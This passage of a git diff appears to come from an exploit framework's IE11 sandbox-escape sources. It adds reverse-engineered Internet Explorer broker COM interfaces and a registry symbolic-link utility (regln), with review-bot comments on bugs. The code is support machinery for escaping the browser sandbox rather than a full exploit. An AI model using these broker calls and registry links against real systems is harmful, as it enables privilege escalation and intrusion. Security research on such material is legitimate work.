STDMETHODCALLTYPE BrokerCoGetClassObject(DWORD pid, _GUID const &, DWORD, _COSERVERINFO *, _GUID const &, IUnknown * *) = 0; +}; + +struct __declspec(uuid("BDB57FF2-79B9-4205-9447-F5FE85F37312")) CIEAxInstallBroker +{ +}; + +struct __declspec(uuid("B2103BDB-B79E-4474-8424-4363161118D5")) IIEAxInstallBrokerBroker : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE BrokerGetAxInstallBroker(REFCLSID rclsid, REFIID riid, int unknown, int type, HWND, IUnknown** ppv) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IIEAxInstallBrokerBroker, __uuidof(IIEAxInstallBrokerBroker)); + +struct ERF +{ + //+0x000 erfOper : Int4B + // + 0x004 erfType : Int4B + // + 0x008 fError : Int4B + + int erfOper; + int erfType; + int fError; +}; + +struct FNAME +{ + /*+0x000 pszFilename : Ptr32 Char + + 0x004 pNextName : Ptr32 sFNAME + + 0x008 status : Uint4B*/ + + char* pszFilenane; + FNAME* pNextName; + UINT status; +}; + +struct SESSION +{ + /*+0x000 cbCabSize : Uint4B + + 0x004 erf : ERF + + 0x010 pFileList : Ptr32 sFNAME + + 0x014 cFiles : Uint4B + + 0x018 flags 
: Uint4B + + 0x01c achLocation : [260] Char + + 0x120 achFile : [260] Char + + 0x224 achCabPath : [260] Char + + 0x328 pFilesToExtract : Ptr32 sFNAME*/ + + UINT cbCabSize; + ERF erf; + FNAME* pFileList; + UINT cFiles; + UINT flags; + char achLocation[260]; + char achFile[260]; + char achCabPath[260]; + FNAME* pFilesToExtract; +}; + +struct __declspec(uuid("BC0EC710-A3ED-4F99-B14F-5FD59FDACEA3")) IIeAxiInstaller2 : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE VerifyFile(BSTR, HWND__ *, BSTR, BSTR, BSTR, unsigned int, unsigned int, _GUID const &, BSTR*, unsigned int *, unsigned char **) = 0; + virtual HRESULT STDMETHODCALLTYPE RunSetupCommand(BSTR, HWND__ *, BSTR, BSTR, BSTR, BSTR, unsigned int, unsigned int *) = 0; + virtual HRESULT STDMETHODCALLTYPE InstallFile(BSTR sessionGuid, HWND__ *, BSTR sourcePath, BSTR sourceFile, BSTR destPath, BSTR destFile, unsigned int unk) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterExeFile(BSTR sessionGuid, BSTR cmdline, int unk, _PROCESS_INFORMATION *) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterDllFile(BSTR, BSTR, int) = 0; + virtual HRESULT STDMETHODCALLTYPE InstallCatalogFile(BSTR, BSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateLanguageCheck(BSTR, unsigned short const *, _FILETIME) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateModuleUsage(BSTR, char const *, char const *, char const *, char const *, unsigned int) = 0; + virtual HRESULT STDMETHODCALLTYPE EnumerateFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0; + virtual HRESULT STDMETHODCALLTYPE 
ExtractFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0; + virtual HRESULT STDMETHODCALLTYPE RemoveExtractedFilesAndDirs(BSTR, SESSION *) = 0; + virtual HRESULT STDMETHODCALLTYPE CreateExtensionsManager(BSTR, _GUID const &, IUnknown * *) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterDllFile2(BSTR, BSTR, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit2(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, int *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateAllowedDomainsList(_GUID const &, BSTR, int) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteExtractedFile(char const *) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IIeAxiInstaller2, __uuidof(IIeAxiInstaller2)); + +struct __declspec(uuid("9AEA8A59-E0C9-40F1-87DD-757061D56177")) IIeAxiAdminInstaller : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE InitializeAdminInstaller(BSTR, BSTR, BSTR*) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IIeAxiAdminInstaller, __uuidof(IIeAxiAdminInstaller)); + +struct __declspec(uuid("A4AAAE00-22E5-4742-ABB7-379D9493A3B7")) IShdocvwBroker : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE RedirectUrl(WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE RedirectShortcut(WORD const *, WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE RedirectUrlWithBindInfo(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE NavigateUrlInNewTabInstance(/* _BROKER_BIND_INFO */ void *, /*_BROKER_REDIRECT_DETAIL */ void *) = 0; + virtual HRESULT 
STDMETHODCALLTYPE ShowInternetOptions(HWND *, WORD const *, WORD const *, long, ITEMIDLIST_ABSOLUTE * *, DWORD, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsZones(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsLanguages(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowPopupManager(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowCachesAndDatabases(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE ConfigurePopupExemption(HWND *, int, WORD const *, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ConfigurePopupMgr(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE RemoveFirstHomePage(void) = 0; + virtual HRESULT STDMETHODCALLTYPE SetHomePage(HWND *, long, ITEMIDLIST_ABSOLUTE * *, long) = 0; + virtual HRESULT STDMETHODCALLTYPE RemoveHomePage(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE FixInternetSecurity(HWND *, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowManageAddons(HWND *, DWORD, _GUID *, DWORD, int) = 0; + virtual HRESULT STDMETHODCALLTYPE CacheExtFileVersion(_GUID const &, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAxApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE SendLink(ITEMIDLIST_ABSOLUTE const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE SendPage(HWND *, IDataObject *) = 0; + virtual HRESULT STDMETHODCALLTYPE NewMessage(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ReadMail(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE SetAsBackground(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSaveBrowseFile(HWND *, WORD const *, WORD const *, int, int, WORD * *, DWORD *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveAsComplete(void) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveAsFile(void) = 0; + virtual HRESULT STDMETHODCALLTYPE StartImportExportWizard(int, HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE EditWith(HWND *, DWORD, HANDLE, 
DWORD, LPCWSTR, LPCWSTR, LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSaveImage(HWND *, WORD const *, DWORD, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveImage(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE CreateShortcut(/* _internet_shortcut_params */ void*, int, HWND *, WORD *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSynchronizeUI(void) = 0; + virtual HRESULT STDMETHODCALLTYPE OpenFolderAndSelectItem(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoGetOpenFileNameDialog(/* _SOpenDlg */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoGetLocationPlatformConsent(HWND *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSaveFileName(HWND *, WORD const *, WORD const *, WORD const *, WORD const *, DWORD, WORD *, DWORD, WORD const *, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveFile(HWND *, DWORD, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE VerifyTrustAndExecute(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFeedByUrl(WORD const *, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerAddToFavoritesEx(HWND *, ITEMIDLIST_ABSOLUTE const *, WORD const *, DWORD, IOleCommandTarget *, WORD *, DWORD, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE Subscribe(HWND *, WORD const *, WORD const *, int, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE MarkAllItemsRead(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE MarkItemsRead(WORD const *, DWORD *, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE Properties(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteFeedItem(HWND *, WORD const *, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteFeed(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteFolder(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE Refresh(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE MoveFeed(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE 
MoveFeedFolder(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE RenameFeed(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE RenameFeedFolder(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE NewFeedFolder(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE FeedRefreshAll(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowFeedAuthDialog(HWND *, WORD const *, /* FEEDTASKS_AUTHTYPE */ DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAddSearchProvider(HWND *, WORD const *, WORD const *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE InitHKCUSearchScopesRegKey(void) = 0; + virtual HRESULT STDMETHODCALLTYPE DoShowDeleteBrowsingHistoryDialog(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE StartAutoProxyDetection(void) = 0; + virtual HRESULT STDMETHODCALLTYPE EditAntiPhishingOptinSetting(HWND *, DWORD, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowMyPictures(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ChangeIntranetSettings(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE FixProtectedModeSettings(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAddService(HWND *, WORD const *, WORD const *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAddWebFilter(HWND *, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoBrowserRegister() = 0; + virtual HRESULT STDMETHODCALLTYPE DoBrowserRevoke(long) = 0; + virtual HRESULT STDMETHODCALLTYPE DoOnNavigate(long, VARIANT *) = 0; + virtual HRESULT STDMETHODCALLTYPE AddDesktopComponent(WORD *, WORD *, VARIANT *, VARIANT *, VARIANT *, VARIANT *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoOnCreated(long, IUnknown *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetShellWindows(IUnknown * *) = 0; + virtual HRESULT STDMETHODCALLTYPE CustomizeSettings(short, short, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE OnFocus(int) = 0; + virtual HRESULT STDMETHODCALLTYPE IsProtectedModeUrl(LPCWSTR) = 0; + virtual HRESULT 
STDMETHODCALLTYPE DoDiagnoseConnectionProblems(HWND *, WORD *, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE PerformDoDragDrop(HWND *, /* IEDataObjectWrapper */ void *, /* IEDropSourceWrapper */ void *, DWORD, DWORD, DWORD *, long *) = 0; + virtual HRESULT STDMETHODCALLTYPE TurnOnFeedSyncEngine(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE InternetSetPerSiteCookieDecisionW(WORD const *, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE SetAttachmentUserOverride(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE WriteClassesOfCategory(_GUID const &, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerSetFocus(DWORD, HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconA(DWORD, /* _BROKER_NOTIFYICONDATAA */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconW(DWORD, /* _BROKER_NOTIFYICONDATAW */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE DisplayVirtualizedFolder(void) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerSetWindowPos(HWND *, HWND *, int, int, int, int, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE WriteUntrustedControlDetails(_GUID const &, WORD const *, WORD const *, DWORD, BYTE *) = 0; + virtual HRESULT STDMETHODCALLTYPE SetComponentDeclined(char const *, char const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoShowPrintDialog(/* _BROKER_PRINTDLG */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE NavigateHomePages(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAxDomainApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ActivateExtensionFromCLSID(HWND *, WORD const *, DWORD, DWORD, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateNewIEWindow(DWORD, _GUID const &, void * *, int, DWORD, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE BeginFakeModalityForwardingToTab() = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerEnableWindow(int, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE 
EndFakeModalityForwardingToTab(HWND *, long) = 0; + virtual HRESULT STDMETHODCALLTYPE CloseOldTabIfFailed(void) = 0; + virtual HRESULT STDMETHODCALLTYPE EnableSuggestedSites(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE SetProgressValue(HWND *, DWORD, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerStartNewIESession(void) = 0; + virtual HRESULT STDMETHODCALLTYPE CompatDetachInputQueue(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE CompatAttachInputQueue(void) = 0; + virtual HRESULT STDMETHODCALLTYPE SetToggleKeys(DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE RepositionInfrontIE(HWND *, int, int, int, int, DWORD) = 0; + //virtual HRESULT STDMETHODCALLTYPE ReportShipAssert(DWORD, DWORD, DWORD, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowOpenSafeOpenDialog(HWND *, /* _BROKER_SAFEOPENDLGPARAM */ void *, DWORD *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerAddSiteToStart(HWND *, WORD *, WORD const *, long, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE SiteModeAddThumbnailButton(DWORD *, HWND *, WORD *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE SiteModeAddButtonStyle(int *, HWND *, DWORD, WORD *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE IsSiteModeFirstRun(int, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE IsImmersiveSiteModeFirstRun(int, WORD const *, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetImmersivePinnedState(DWORD, int, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerDoSiteModeDragDrop(DWORD, long *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE EnterUILock(long) = 0; + virtual HRESULT STDMETHODCALLTYPE LeaveUILock(long) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialAdd(/* _IECREDENTIAL */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialGet(WORD const *, WORD const *, /*_IECREDENTIAL */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialFindAllByUrl(WORD const *, DWORD *, /* _IECREDENTIAL */ void * *) = 0; + virtual 
HRESULT STDMETHODCALLTYPE CredentialRemove(WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowOpenFile(HWND *, DWORD, DWORD, WORD *, WORD *, WORD const *, WORD const *, WORD const *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowImmersiveOpenFilePicker(HWND *, int, WORD const *, IUnknown * *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterFileDragDrop(HWND *, DWORD, unsigned char *) = 0; + virtual HRESULT STDMETHODCALLTYPE RevokeFileDragDrop(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropA(HWND *, DWORD, char * *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropW(HWND *, DWORD, WORD * *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowEPMCompatDocHostConsent(HWND *, WORD const *, WORD const *, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetModuleInfoFromSignature(WORD const *, WORD * *, DWORD, WORD * *, WORD * *, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShellExecWithActivationHandler(HWND *, LPCWSTR, LPCWSTR, int, /* _MSLAUNCH_HANDLER_STATUS */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShellExecFolderUri(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowIMMessageDialog(HWND *, WORD const *, WORD const *, /* _IM_BUTTON_LABEL_ID */ void *, DWORD, DWORD, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFileHandle(HWND *, BSTR filename, BYTE * hash, DWORD hashlen, HANDLE*) = 0; + virtual HRESULT STDMETHODCALLTYPE MOTWCreateFileW(DWORD dwProcessId, BSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, int dwOpenMode, DWORD dwFlagsAndAttributes, ULONGLONG* h, DWORD *error) = 0; + virtual HRESULT STDMETHODCALLTYPE MOTWFindFileW() = 0; + virtual HRESULT STDMETHODCALLTYPE MOTWGetFileDataW() = 0; + virtual HRESULT STDMETHODCALLTYPE WinRTInitializeWithWindow(IUnknown *, HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoProvisionNetworks(HWND *, 
WORD const *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetAccessibilityStylesheet(DWORD, unsigned __int64 *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetAppCacheUsage(WORD const *, unsigned __int64 *, unsigned __int64 *) = 0; + virtual HRESULT STDMETHODCALLTYPE HiddenTabRequest(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* _HIDDENTAB_REQUEST_INFO */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetMaxCpuSpeed(DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetProofOfPossessionTokensForUrl(WORD const *, DWORD *, /* _IEProofOfPossessionToken */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetLoginUrl(LPWSTR*) = 0; + virtual HRESULT STDMETHODCALLTYPE ScheduleDeleteEncryptedMediaData() = 0; + virtual HRESULT STDMETHODCALLTYPE IsDeleteEncryptedMediaDataPending() = 0; + virtual HRESULT STDMETHODCALLTYPE GetFrameAppDataPathA() = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerHandlePrivateNetworkFailure() = 0; + +}; + + +_COM_SMARTPTR_TYPEDEF(IIEUserBroker, __uuidof(IIEUserBroker)); +_COM_SMARTPTR_TYPEDEF(IShdocvwBroker, __uuidof(IShdocvwBroker)); \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp new file mode 100755 index 0000000000..50830eee4a --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp 
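Review bot: The `FNAME` member in interfaces.h is spelled `pszFilenane` while the layout comment directly above it names the field `pszFilename`; declare it as `char* pszFilename;` so the struct matches its own documentation. In `IShdocvwBroker` the `ReportShipAssert` method is commented out without explanation, and since these are positional virtual declarations its removal changes the slot of every method declared after it; a comment such as `// ReportShipAssert omitted: not present in <build this layout was taken from>` would record the reason. The offset comments in `ERF`, `FNAME` and `SESSION` use `Ptr32` sizes, so they describe only a 32-bit layout, and the header does not say which component version any of these layouts correspond to; a short note at the top of the file stating both would make a mismatch easier to diagnose.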
@@ -0,0 +1,161 @@
+/*--------------------------------------------------------------------
+REGLN - Manage Windows Rregistry Links V20R0
+======================================================================
+ Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
+
+ The following Copyrights apply:
+
+ Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
+ Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
+ Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
+
+ License:
+
+ This software is distributed under the terms and conditions of
+ GPL - GNU General Public License. The software is provided AS
+ IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
+ responsibility for any damages or consequences of usage of this
+ software. For more information, please read the attached GPL.TXT.
+
+--------------------------------------------------------------------*/
+
+#define _CRT_SECURE_NO_WARNINGS
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <wchar.h>
+#include "regln.h"
+#include "Utils.h"
+
+
+int checkargs(int argc, char *argv[]);
+char *win2ntapi(char *win, int len);
+int ntapi_init(void);
+int usage(void);
+
+static fNtCreateKey NtCreateKey;
+static fNtDeleteKey NtDeleteKey;
+static fNtSetValueKey NtSetValueKey;
+
+int DeleteLink(LPCWSTR par_src)
+{
+ DWORD disposition, status;
+ HANDLE hdl_nt_keyhandle;
+ UNICODE_STRING nt_keyname;
+ OBJECT_ATTRIBUTES nt_object_attributes;
+
+ ntapi_init();
+
+ nt_keyname.Buffer = par_src;
+ nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
+
+ nt_object_attributes.ObjectName = &nt_keyname;
+ nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE | REG_OPTION_OPEN_LINK_ATTR;
+ nt_object_attributes.RootDirectory = NULL; //
+ nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
+ nt_object_attributes.SecurityQualityOfService = NULL; //
+ nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
+
+ // open link
+ status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE, &disposition);
+
+ if (status == 0) {
+ DebugPrintf("DEBUG: %ls opened successfully.\n", par_src);
+
+ // delete
+ status = NtDeleteKey(hdl_nt_keyhandle);
+
+ if (status == 0) {
+ DebugPrintf("DEBUG: %ls deleted successfully.\n", par_src);
+ }
+ else {
+ DebugPrintf("ERROR: Link deletion failed. [Step 2] [Error %08X]\n", status);
+ return 1;
+ }
+ }
+ else {
+ DebugPrintf("ERROR: Link deletion failed. [Step 1] [Error %08X]\n", status);
+ return 1;
+ }
+
+ return 0;
+};
+
+int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile)
+{
+ DWORD disposition, status;
+ HANDLE hdl_nt_keyhandle;
+ UNICODE_STRING nt_keyname, nt_valuename;
+ OBJECT_ATTRIBUTES nt_object_attributes;
+
+ ntapi_init();
+
+ nt_keyname.Buffer = par_src;
+ nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
+
+ nt_object_attributes.ObjectName = &nt_keyname;
+ nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE;
+ nt_object_attributes.RootDirectory = NULL; //
+ nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
+ nt_object_attributes.SecurityQualityOfService = NULL; //
+ nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
+
+ // create the key
+ if (opt_volatile)
+ status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
+ else
+ status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
+
+ if (status == 0) {
+ DebugPrintf("DEBUG: Key %ls created successfully.\n", par_src);
+
+ // the real action is here:
+
+ nt_valuename.Buffer = REG_LINK_VALUE_NAME;
+ nt_valuename.Length = wcslen(REG_LINK_VALUE_NAME) * sizeof(WCHAR);
+
+ status = NtSetValueKey(hdl_nt_keyhandle, &nt_valuename, 0, REG_LINK, par_dst, wcslen(par_dst) * sizeof(WCHAR));
+
+ if (status == 0) {
+ DebugPrintf("DEBUG: Value REG_LINK:%ls=%ls set succesfully.\n", REG_LINK_VALUE_NAME, par_dst);
+ }
+ else {
+ DebugPrintf("ERROR: Link creation failed. [Step 2] [Error %08X]\n", status);
+ return 1;
+ }
+ }
+ else {
+ DebugPrintf("ERROR: Link creation failed. [Step 1] [Error %08X]\n", status);
+ return 1;
+ }
+
+ return 0;
+}
+
+
+int ntapi_init(void) {
+ #ifdef DEBUG
+ DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtCreateKey...\n");
+ #endif
+ if(!(NtCreateKey = (fNtCreateKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateKey" ))) {
+ DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
+ return 1;
+ }
+ #ifdef DEBUG
+ DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtDeleteKey...\n");
+ #endif
+ if(!(NtDeleteKey = (fNtDeleteKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtDeleteKey" ))) {
+ DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
+ return 1;
+ }
+ #ifdef DEBUG
+ DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtSetValueKey...\n");
+ #endif
+ if(!(NtSetValueKey = (fNtSetValueKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSetValueKey" ))) {
+ DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
+ return 1;
+ }
+ return 0;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h
new file mode 100755
index 0000000000..b760e6e540
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h
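Review bot: DeleteLink and CreateLink both call `ntapi_init();` and discard its result, so if any of the GetProcAddress lookups fails, the NtCreateKey call that follows goes through a null function pointer; the call should be `if (ntapi_init() != 0) return 1;`. Neither function sets `MaximumLength` on the UNICODE_STRING values it builds (`nt_keyname`, and `nt_valuename` in CreateLink), so that field is passed to the native API holding whatever was on the stack; adding `nt_keyname.MaximumLength = nt_keyname.Length;` after each Length assignment fixes it. `Length` is declared as `WORD` in regln.h, so the `wcslen(...) * sizeof(WCHAR)` assignments truncate silently for long paths and deserve a bounds check. The key handle returned by NtCreateKey is never closed on any path in either function.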
@@ -0,0 +1,70 @@
+/*--------------------------------------------------------------------
+REGLN - Manage Windows Rregistry Links V20R0
+======================================================================
+ Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
+
+ The following Copyrights apply:
+
+ Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
+ Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
+ Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
+
+ License:
+
+ This software is distributed under the terms and conditions of
+ GPL - GNU General Public License. The software is provided AS
+ IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
+ responsibility for any damages or consequences of usage of this
+ software. For more information, please read the attached GPL.TXT.
+
+--------------------------------------------------------------------*/
+
+
+
+#define REG_LINK_VALUE_NAME L"SymbolicLinkValue" // found by tenox
+//#define REG_OPTION_CREATE_LINK 2 // this is defined in MSVC 2.0 but not after
+#define REG_OPTION_OPEN_LINK_ATTR 0x100 // found by tommy
+#define OBJ_CASE_INSENSITIVE 0x40
+
+//
+// Following definitions are generously provided by Mark Russinovitch
+//
+typedef struct _UNICODE_STRING {
+ WORD Length;
+ WORD MaximumLength;
+ PCWSTR Buffer;
